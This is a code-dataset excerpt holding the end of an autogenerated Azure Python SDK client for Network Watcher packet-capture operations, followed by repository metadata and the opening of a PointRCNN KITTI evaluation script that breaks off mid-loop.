:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["models.PacketCaptureResult"]
error_map = {404: ResourceNotFoundError, 409: ResourceExistsError}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-04-01"
# Construct URL
url = self.get.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'networkWatcherName': self._serialize.url("network_watcher_name", network_watcher_name, 'str'),
'packetCaptureName': self._serialize.url("packet_capture_name", packet_capture_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = 'application/json'
# Construct and send request
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(models.ErrorResponse, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('PacketCaptureResult', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/networkWatchers/{networkWatcherName}/packetCaptures/{packetCaptureName}'} # type: ignore
def _delete_initial(
self,
resource_group_name, # type: str
network_watcher_name, # type: str
packet_capture_name, # type: str
**kwargs # type: Any
):
# type: (...) -> None
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {404: ResourceNotFoundError, 409: ResourceExistsError}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-04-01"
# Construct URL
url = self._delete_initial.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'networkWatcherName': self._serialize.url("network_watcher_name", network_watcher_name, 'str'),
'packetCaptureName': self._serialize.url("packet_capture_name", packet_capture_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
# Construct and send request
request = self._client.delete(url, query_parameters, header_parameters)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [202, 204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(models.ErrorResponse, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
_delete_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/networkWatchers/{networkWatcherName}/packetCaptures/{packetCaptureName}'} # type: ignore
def begin_delete(
self,
resource_group_name, # type: str
network_watcher_name, # type: str
packet_capture_name, # type: str
**kwargs # type: Any
):
# type: (...) -> LROPoller
"""Deletes the specified packet capture session.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param network_watcher_name: The name of the network watcher.
:type network_watcher_name: str
:param packet_capture_name: The name of the packet capture session.
:type packet_capture_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: True for ARMPolling, False for no polling, or a
polling object for personal polling strategy
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
:return: An instance of LROPoller that returns either None or the result of cls(response)
:rtype: ~azure.core.polling.LROPoller[None]
:raises ~azure.core.exceptions.HttpResponseError:
"""
polling = kwargs.pop('polling', True) # type: Union[bool, PollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType[None]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = self._delete_initial(
resource_group_name=resource_group_name,
network_watcher_name=network_watcher_name,
packet_capture_name=packet_capture_name,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
kwargs.pop('content_type', None)
def get_long_running_output(pipeline_response):
if cls:
return cls(pipeline_response, None, {})
if polling is True: polling_method = ARMPolling(lro_delay, lro_options={'final-state-via': 'location'}, **kwargs)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_delete.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/networkWatchers/{networkWatcherName}/packetCaptures/{packetCaptureName}'} # type: ignore
def _stop_initial(
self,
resource_group_name, # type: str
network_watcher_name, # type: str
packet_capture_name, # type: str
**kwargs # type: Any
):
# type: (...) -> None
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {404: ResourceNotFoundError, 409: ResourceExistsError}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-04-01"
# Construct URL
url = self._stop_initial.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'networkWatcherName': self._serialize.url("network_watcher_name", network_watcher_name, 'str'),
'packetCaptureName': self._serialize.url("packet_capture_name", packet_capture_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
# Construct and send request
request = self._client.post(url, query_parameters, header_parameters)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 202]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(models.ErrorResponse, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
_stop_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/networkWatchers/{networkWatcherName}/packetCaptures/{packetCaptureName}/stop'} # type: ignore
def begin_stop(
self,
resource_group_name, # type: str
network_watcher_name, # type: str
packet_capture_name, # type: str
**kwargs # type: Any
):
# type: (...) -> LROPoller
"""Stops a specified packet capture session.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param network_watcher_name: The name of the network watcher.
:type network_watcher_name: str
:param packet_capture_name: The name of the packet capture session.
:type packet_capture_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: True for ARMPolling, False for no polling, or a
polling object for personal polling strategy
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
:return: An instance of LROPoller that returns either None or the result of cls(response)
:rtype: ~azure.core.polling.LROPoller[None]
:raises ~azure.core.exceptions.HttpResponseError:
"""
polling = kwargs.pop('polling', True) # type: Union[bool, PollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType[None]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = self._stop_initial(
resource_group_name=resource_group_name,
network_watcher_name=network_watcher_name,
packet_capture_name=packet_capture_name,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
kwargs.pop('content_type', None)
def get_long_running_output(pipeline_response):
if cls:
return cls(pipeline_response, None, {})
if polling is True: polling_method = ARMPolling(lro_delay, lro_options={'final-state-via': 'location'}, **kwargs)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_stop.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/networkWatchers/{networkWatcherName}/packetCaptures/{packetCaptureName}/stop'} # type: ignore
def _get_status_initial(
self,
resource_group_name, # type: str
network_watcher_name, # type: str
packet_capture_name, # type: str
**kwargs # type: Any
):
# type: (...) -> "models.PacketCaptureQueryStatusResult"
cls = kwargs.pop('cls', None) # type: ClsType["models.PacketCaptureQueryStatusResult"]
error_map = {404: ResourceNotFoundError, 409: ResourceExistsError}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-04-01"
# Construct URL
url = self._get_status_initial.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'networkWatcherName': self._serialize.url("network_watcher_name", network_watcher_name, 'str'),
'packetCaptureName': self._serialize.url("packet_capture_name", packet_capture_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = 'application/json'
# Construct and send request
request = self._client.post(url, query_parameters, header_parameters)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 202]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(models.ErrorResponse, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('PacketCaptureQueryStatusResult', pipeline_response)
if response.status_code == 202:
deserialized = self._deserialize('PacketCaptureQueryStatusResult', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
_get_status_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/networkWatchers/{networkWatcherName}/packetCaptures/{packetCaptureName}/queryStatus'} # type: ignore
def begin_get_status(
self,
resource_group_name, # type: str
network_watcher_name, # type: str
packet_capture_name, # type: str
**kwargs # type: Any
):
# type: (...) -> LROPoller
"""Query the status of a running packet capture session.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param network_watcher_name: The name of the Network Watcher resource.
:type network_watcher_name: str
:param packet_capture_name: The name given to the packet capture session.
:type packet_capture_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: True for ARMPolling, False for no polling, or a
polling object for personal polling strategy
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
:return: An instance of LROPoller that returns either PacketCaptureQueryStatusResult or the result of cls(response)
:rtype: ~azure.core.polling.LROPoller[~azure.mgmt.network.v2020_04_01.models.PacketCaptureQueryStatusResult]
:raises ~azure.core.exceptions.HttpResponseError:
"""
polling = kwargs.pop('polling', True) # type: Union[bool, PollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType["models.PacketCaptureQueryStatusResult"]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = self._get_status_initial(
resource_group_name=resource_group_name,
network_watcher_name=network_watcher_name,
packet_capture_name=packet_capture_name,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
kwargs.pop('content_type', None)
def get_long_running_output(pipeline_response):
deserialized = self._deserialize('PacketCaptureQueryStatusResult', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
if polling is True: polling_method = ARMPolling(lro_delay, lro_options={'final-state-via': 'location'}, **kwargs)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_get_status.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/networkWatchers/{networkWatcherName}/packetCaptures/{packetCaptureName}/queryStatus'} # type: ignore
def list(
self,
resource_group_name, # type: str
network_watcher_name, # type: str
**kwargs # type: Any
):
# type: (...) -> Iterable["models.PacketCaptureListResult"]
"""Lists all packet capture sessions within the specified resource group.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param network_watcher_name: The name of the Network Watcher resource.
:type network_watcher_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either PacketCaptureListResult or the result of cls(response)
:rtype: ~azure.core.paging.ItemPaged[~azure.mgmt.network.v2020_04_01.models.PacketCaptureListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["models.PacketCaptureListResult"]
error_map = {404: ResourceNotFoundError, 409: ResourceExistsError}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-04-01"
def prepare_request(next_link=None):
if not next_link:
# Construct URL
url = self.list.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'networkWatcherName': self._serialize.url("network_watcher_name", network_watcher_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = 'application/json'
# Construct and send request
request = self._client.get(url, query_parameters, header_parameters)
return request
def extract_data(pipeline_response):
deserialized = self._deserialize('PacketCaptureListResult', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return None, iter(list_of_elem)
def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
error = self._deserialize(models.ErrorResponse, response)
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
return pipeline_response
return ItemPaged(
get_next, extract_data
)
list.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/networkWatchers/{networkWatcherName}/packetCaptures'} # type: ignore
| 49.712074
| 240
| 0.668307
|
ba844ebd09cc97060b1b27ccb2d8ea5471f82990
| 41,811
|
py
|
Python
|
PointRCNNV1/tools/eval_rcnn.py
|
kangpl/semester_project_cvlab
|
fca8e47c619b03599e8f878aae3371a0060e45a7
|
[
"Artistic-1.0-cl8"
] | 4
|
2021-03-14T17:41:21.000Z
|
2021-11-04T07:16:39.000Z
|
PointRCNNV1/tools/eval_rcnn.py
|
kangpl/semester_project_cvlab
|
fca8e47c619b03599e8f878aae3371a0060e45a7
|
[
"Artistic-1.0-cl8"
] | 1
|
2021-04-17T14:50:41.000Z
|
2021-04-17T14:50:41.000Z
|
PointRCNNV1/tools/eval_rcnn.py
|
kangpl/semester_project_cvlab
|
fca8e47c619b03599e8f878aae3371a0060e45a7
|
[
"Artistic-1.0-cl8"
] | 1
|
2021-02-01T09:25:49.000Z
|
2021-02-01T09:25:49.000Z
|
import _init_path
import os
import numpy as np
import torch
from torch.utils.data import DataLoader
import torch.nn.functional as F
from lib.net.point_rcnn import PointRCNN
from lib.datasets.kitti_rcnn_dataset import KittiRCNNDataset
import tools.train_utils.train_utils as train_utils
from lib.utils.bbox_transform import decode_bbox_target
from tools.kitti_object_eval_python.evaluate import evaluate as kitti_evaluate
from lib.config import cfg, cfg_from_file, save_config_to_file, cfg_from_list
import argparse
import lib.utils.kitti_utils as kitti_utils
import lib.utils.iou3d.iou3d_utils as iou3d_utils
from datetime import datetime
import logging
import re
import glob
import time
from tensorboardX import SummaryWriter
import tqdm
np.random.seed(1024) # set the same seed
parser = argparse.ArgumentParser(description="arg parser")
parser.add_argument('--cfg_file', type=str, default='cfgs/default.yml', help='specify the config for evaluation')
parser.add_argument("--eval_mode", type=str, default='rpn', required=True, help="specify the evaluation mode")
parser.add_argument('--eval_all', action='store_true', default=False, help='whether to evaluate all checkpoints')
parser.add_argument('--test', action='store_true', default=False, help='evaluate without ground truth')
parser.add_argument("--ckpt", type=str, default=None, help="specify a checkpoint to be evaluated")
parser.add_argument("--rpn_ckpt", type=str, default=None, help="specify the checkpoint of rpn if trained separated")
parser.add_argument("--rcnn_ckpt", type=str, default=None, help="specify the checkpoint of rcnn if trained separated")
parser.add_argument('--batch_size', type=int, default=1, help='batch size for evaluation')
parser.add_argument('--workers', type=int, default=4, help='number of workers for dataloader')
parser.add_argument("--extra_tag", type=str, default='default', help="extra tag for multiple evaluation")
parser.add_argument('--output_dir', type=str, default=None, help='specify an output directory if needed')
parser.add_argument("--ckpt_dir", type=str, default=None, help="specify a ckpt directory to be evaluated if needed")
parser.add_argument('--save_result', action='store_true', default=False, help='save evaluation results to files')
parser.add_argument('--save_rpn_feature', action='store_true', default=False,
help='save features for separately rcnn training and evaluation')
parser.add_argument('--random_select', action='store_true', default=True, help='sample to the same number of points')
parser.add_argument('--start_epoch', default=0, type=int, help='ignore the checkpoint smaller than this epoch')
parser.add_argument("--rcnn_eval_roi_dir", type=str, default=None,
help='specify the saved rois for rcnn evaluation when using rcnn_offline mode')
parser.add_argument("--rcnn_eval_feature_dir", type=str, default=None,
help='specify the saved features for rcnn evaluation when using rcnn_offline mode')
parser.add_argument('--set', dest='set_cfgs', default=None, nargs=argparse.REMAINDER,
help='set extra config keys if needed')
parser.add_argument("--rpn_bgr", type=str, default=None,
help='specify the saved bgr for rpn training')
parser.add_argument("--rpn_mean_covariance", type=str, default=None,
help='specify the saved mean covariance for rpn training')
args = parser.parse_args()
def create_logger(log_file):
log_format = '%(asctime)s %(levelname)5s %(message)s'
logging.basicConfig(level=logging.INFO, format=log_format, filename=log_file)
console = logging.StreamHandler()
console.setLevel(logging.INFO)
console.setFormatter(logging.Formatter(log_format))
logging.getLogger(__name__).addHandler(console)
return logging.getLogger(__name__)
def save_kitti_format(sample_id, calib, bbox3d, kitti_output_dir, scores, img_shape):
corners3d = kitti_utils.boxes3d_to_corners3d(bbox3d)
img_boxes, _ = calib.corners3d_to_img_boxes(corners3d)
img_boxes[:, 0] = np.clip(img_boxes[:, 0], 0, img_shape[1] - 1)
img_boxes[:, 1] = np.clip(img_boxes[:, 1], 0, img_shape[0] - 1)
img_boxes[:, 2] = np.clip(img_boxes[:, 2], 0, img_shape[1] - 1)
img_boxes[:, 3] = np.clip(img_boxes[:, 3], 0, img_shape[0] - 1)
img_boxes_w = img_boxes[:, 2] - img_boxes[:, 0]
img_boxes_h = img_boxes[:, 3] - img_boxes[:, 1]
box_valid_mask = np.logical_and(img_boxes_w < img_shape[1] * 0.8, img_boxes_h < img_shape[0] * 0.8)
kitti_output_file = os.path.join(kitti_output_dir, '%06d.txt' % sample_id)
with open(kitti_output_file, 'w') as f:
for k in range(bbox3d.shape[0]):
if box_valid_mask[k] == 0:
continue
x, z, ry = bbox3d[k, 0], bbox3d[k, 2], bbox3d[k, 6]
beta = np.arctan2(z, x)
alpha = -np.sign(beta) * np.pi / 2 + beta + ry
print('%s -1 -1 %.4f %.4f %.4f %.4f %.4f %.4f %.4f %.4f %.4f %.4f %.4f %.4f %.4f' %
(cfg.CLASSES, alpha, img_boxes[k, 0], img_boxes[k, 1], img_boxes[k, 2], img_boxes[k, 3],
bbox3d[k, 3], bbox3d[k, 4], bbox3d[k, 5], bbox3d[k, 0], bbox3d[k, 1], bbox3d[k, 2],
bbox3d[k, 6], scores[k]), file=f)
def save_rpn_features(seg_result, rpn_scores_raw, pts_features, backbone_xyz, backbone_features, kitti_features_dir,
sample_id):
pts_intensity = pts_features[:, 0]
output_file = os.path.join(kitti_features_dir, '%06d.npy' % sample_id)
xyz_file = os.path.join(kitti_features_dir, '%06d_xyz.npy' % sample_id)
seg_file = os.path.join(kitti_features_dir, '%06d_seg.npy' % sample_id)
intensity_file = os.path.join(kitti_features_dir, '%06d_intensity.npy' % sample_id)
np.save(output_file, backbone_features)
np.save(xyz_file, backbone_xyz)
np.save(seg_file, seg_result)
np.save(intensity_file, pts_intensity)
rpn_scores_raw_file = os.path.join(kitti_features_dir, '%06d_rawscore.npy' % sample_id)
np.save(rpn_scores_raw_file, rpn_scores_raw)
def eval_one_epoch_rpn(model, dataloader, epoch_id, result_dir, logger):
np.random.seed(1024)
mode = 'TEST' if args.test else 'EVAL'
if args.save_rpn_feature:
kitti_features_dir = os.path.join(result_dir, 'features')
os.makedirs(kitti_features_dir, exist_ok=True)
if args.save_result or args.save_rpn_feature:
kitti_output_dir = os.path.join(result_dir, 'detections', 'data')
seg_output_dir = os.path.join(result_dir, 'seg_result')
os.makedirs(kitti_output_dir, exist_ok=True)
os.makedirs(seg_output_dir, exist_ok=True)
logger.info('---- EPOCH %s RPN EVALUATION ----' % epoch_id)
model.eval()
thresh_list = [0.1, 0.3, 0.5, 0.7, 0.9]
total_recalled_bbox_list, total_gt_bbox = [0] * 5, 0
dataset = dataloader.dataset
cnt = max_num = rpn_iou_avg = 0
progress_bar = tqdm.tqdm(total=len(dataloader), leave=True, desc='eval')
for data in dataloader:
sample_id_list, pts_rect, pts_features, pts_input = \
data['sample_id'], data['pts_rect'], data['pts_features'], data['pts_input']
sample_id = sample_id_list[0]
cnt += len(sample_id_list)
if not args.test:
rpn_cls_label, rpn_reg_label = data['rpn_cls_label'], data['rpn_reg_label']
gt_boxes3d = data['gt_boxes3d']
rpn_cls_label = torch.from_numpy(rpn_cls_label).cuda(non_blocking=True).long()
if gt_boxes3d.shape[1] == 0: # (B, M, 7)
pass
# logger.info('%06d: No gt box' % sample_id)
else:
gt_boxes3d = torch.from_numpy(gt_boxes3d).cuda(non_blocking=True).float()
inputs = torch.from_numpy(pts_input).cuda(non_blocking=True).float()
input_data = {'pts_input': inputs}
# model inference
ret_dict = model(input_data)
rpn_cls, rpn_reg = ret_dict['rpn_cls'], ret_dict['rpn_reg']
backbone_xyz, backbone_features = ret_dict['backbone_xyz'], ret_dict['backbone_features']
rpn_scores_raw = rpn_cls[:, :, 0]
rpn_scores = torch.sigmoid(rpn_scores_raw)
seg_result = (rpn_scores > cfg.RPN.SCORE_THRESH).long()
# proposal layer
rois, roi_scores_raw = model.rpn.proposal_layer(rpn_scores_raw, rpn_reg, backbone_xyz) # (B, M, 7)
batch_size = rois.shape[0]
# calculate recall and save results to file
for bs_idx in range(batch_size):
cur_sample_id = sample_id_list[bs_idx]
cur_scores_raw = roi_scores_raw[bs_idx] # (N)
cur_boxes3d = rois[bs_idx] # (N, 7)
cur_seg_result = seg_result[bs_idx]
cur_pts_rect = pts_rect[bs_idx]
# calculate recall
if not args.test:
cur_rpn_cls_label = rpn_cls_label[bs_idx]
cur_gt_boxes3d = gt_boxes3d[bs_idx]
k = cur_gt_boxes3d.__len__() - 1
while k > 0 and cur_gt_boxes3d[k].sum() == 0:
k -= 1
cur_gt_boxes3d = cur_gt_boxes3d[:k + 1]
recalled_num = 0
if cur_gt_boxes3d.shape[0] > 0:
iou3d = iou3d_utils.boxes_iou3d_gpu(cur_boxes3d, cur_gt_boxes3d[:, 0:7])
gt_max_iou, _ = iou3d.max(dim=0)
for idx, thresh in enumerate(thresh_list):
total_recalled_bbox_list[idx] += (gt_max_iou > thresh).sum().item()
recalled_num = (gt_max_iou > 0.7).sum().item()
total_gt_bbox += cur_gt_boxes3d.__len__()
fg_mask = cur_rpn_cls_label > 0
correct = ((cur_seg_result == cur_rpn_cls_label) & fg_mask).sum().float()
union = fg_mask.sum().float() + (cur_seg_result > 0).sum().float() - correct
rpn_iou = correct / torch.clamp(union, min=1.0)
rpn_iou_avg += rpn_iou.item()
# save result
if args.save_rpn_feature:
# save features to file
save_rpn_features(seg_result[bs_idx].float().cpu().numpy(),
rpn_scores_raw[bs_idx].float().cpu().numpy(),
pts_features[bs_idx],
backbone_xyz[bs_idx].cpu().numpy(),
backbone_features[bs_idx].cpu().numpy().transpose(1, 0),
kitti_features_dir, cur_sample_id)
if args.save_result or args.save_rpn_feature:
cur_pred_cls = cur_seg_result.cpu().numpy()
output_file = os.path.join(seg_output_dir, '%06d.npy' % cur_sample_id)
if not args.test:
cur_gt_cls = cur_rpn_cls_label.cpu().numpy()
output_data = np.concatenate(
(cur_pts_rect.reshape(-1, 3), cur_gt_cls.reshape(-1, 1), cur_pred_cls.reshape(-1, 1)), axis=1)
else:
output_data = np.concatenate((cur_pts_rect.reshape(-1, 3), cur_pred_cls.reshape(-1, 1)), axis=1)
np.save(output_file, output_data.astype(np.float16))
# save as kitti format
calib = dataset.get_calib(cur_sample_id)
cur_boxes3d = cur_boxes3d.cpu().numpy()
image_shape = dataset.get_image_shape(cur_sample_id)
save_kitti_format(cur_sample_id, calib, cur_boxes3d, kitti_output_dir, cur_scores_raw, image_shape)
disp_dict = {'mode': mode, 'recall': '%d/%d' % (total_recalled_bbox_list[3], total_gt_bbox),
'rpn_iou': rpn_iou_avg / max(cnt, 1.0)}
progress_bar.set_postfix(disp_dict)
progress_bar.update()
progress_bar.close()
logger.info(str(datetime.now()))
logger.info('-------------------performance of epoch %s---------------------' % epoch_id)
logger.info('max number of objects: %d' % max_num)
logger.info('rpn iou avg: %f' % (rpn_iou_avg / max(cnt, 1.0)))
ret_dict = {'max_obj_num': max_num, 'rpn_iou': rpn_iou_avg / cnt}
for idx, thresh in enumerate(thresh_list):
cur_recall = total_recalled_bbox_list[idx] / max(total_gt_bbox, 1.0)
logger.info('total bbox recall(thresh=%.3f): %d / %d = %f' % (thresh, total_recalled_bbox_list[idx],
total_gt_bbox, cur_recall))
ret_dict['rpn_recall(thresh=%.2f)' % thresh] = cur_recall
logger.info('result is saved to: %s' % result_dir)
return ret_dict
def eval_one_epoch_rcnn(model, dataloader, epoch_id, result_dir, logger):
np.random.seed(1024)
MEAN_SIZE = torch.from_numpy(cfg.CLS_MEAN_SIZE[0]).cuda()
mode = 'TEST' if args.test else 'EVAL'
final_output_dir = os.path.join(result_dir, 'final_result', 'data')
os.makedirs(final_output_dir, exist_ok=True)
if args.save_result:
roi_output_dir = os.path.join(result_dir, 'roi_result', 'data')
refine_output_dir = os.path.join(result_dir, 'refine_result', 'data')
os.makedirs(roi_output_dir, exist_ok=True)
os.makedirs(refine_output_dir, exist_ok=True)
logger.info('---- EPOCH %s RCNN EVALUATION ----' % epoch_id)
model.eval()
thresh_list = [0.1, 0.3, 0.5, 0.7, 0.9]
total_recalled_bbox_list, total_gt_bbox = [0] * 5, 0
total_roi_recalled_bbox_list = [0] * 5
dataset = dataloader.dataset
cnt = final_total = total_cls_acc = total_cls_acc_refined = 0
progress_bar = tqdm.tqdm(total=len(dataloader), leave=True, desc='eval')
for data in dataloader:
sample_id = data['sample_id']
cnt += 1
assert args.batch_size == 1, 'Only support bs=1 here'
input_data = {}
for key, val in data.items():
if key != 'sample_id':
input_data[key] = torch.from_numpy(val).contiguous().cuda(non_blocking=True).float()
roi_boxes3d = input_data['roi_boxes3d']
roi_scores = input_data['roi_scores']
if cfg.RCNN.ROI_SAMPLE_JIT:
for key, val in input_data.items():
if key in ['gt_iou', 'gt_boxes3d']:
continue
input_data[key] = input_data[key].unsqueeze(dim=0)
else:
pts_input = torch.cat((input_data['pts_input'], input_data['pts_features']), dim=-1)
input_data['pts_input'] = pts_input
ret_dict = model(input_data)
rcnn_cls = ret_dict['rcnn_cls']
rcnn_reg = ret_dict['rcnn_reg']
# bounding box regression
anchor_size = MEAN_SIZE
if cfg.RCNN.SIZE_RES_ON_ROI:
roi_size = input_data['roi_size']
anchor_size = roi_size
pred_boxes3d = decode_bbox_target(roi_boxes3d, rcnn_reg,
anchor_size=anchor_size,
loc_scope=cfg.RCNN.LOC_SCOPE,
loc_bin_size=cfg.RCNN.LOC_BIN_SIZE,
num_head_bin=cfg.RCNN.NUM_HEAD_BIN,
get_xz_fine=True, get_y_by_bin=cfg.RCNN.LOC_Y_BY_BIN,
loc_y_scope=cfg.RCNN.LOC_Y_SCOPE, loc_y_bin_size=cfg.RCNN.LOC_Y_BIN_SIZE,
get_ry_fine=True)
# scoring
if rcnn_cls.shape[1] == 1:
raw_scores = rcnn_cls.view(-1)
norm_scores = torch.sigmoid(raw_scores)
pred_classes = (norm_scores > cfg.RCNN.SCORE_THRESH).long()
else:
pred_classes = torch.argmax(rcnn_cls, dim=1).view(-1)
cls_norm_scores = F.softmax(rcnn_cls, dim=1)
raw_scores = rcnn_cls[:, pred_classes]
norm_scores = cls_norm_scores[:, pred_classes]
# evaluation
disp_dict = {'mode': mode}
if not args.test:
gt_boxes3d = input_data['gt_boxes3d']
gt_iou = input_data['gt_iou']
# calculate recall
gt_num = gt_boxes3d.shape[0]
if gt_num > 0:
iou3d = iou3d_utils.boxes_iou3d_gpu(pred_boxes3d, gt_boxes3d)
gt_max_iou, _ = iou3d.max(dim=0)
refined_iou, _ = iou3d.max(dim=1)
for idx, thresh in enumerate(thresh_list):
